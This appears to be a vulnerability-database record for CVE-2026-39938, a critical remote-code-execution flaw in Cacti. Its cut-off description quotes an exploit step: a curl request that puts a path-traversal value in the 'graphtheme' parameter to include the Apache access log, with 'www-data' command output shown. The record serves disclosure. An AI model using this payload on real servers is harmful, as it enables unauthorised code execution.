9.8
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
CVE-2026-39938: Cacti " 3.2 Execute the Code by Including Log File bash curl -k -s "http://target-cacti/graphimage.php?action=view&localgraphid=1&graphtheme=../../../../../../../var/log/apache2/access.log" Result: Command output e.g., uid=33www-data...
Basic Information
ID
C1779145-9574-5457-B610-1891430BF6B2
Published
Jun 26, 2026 at 17:27
Modified
Jun 26, 2026 at 17:29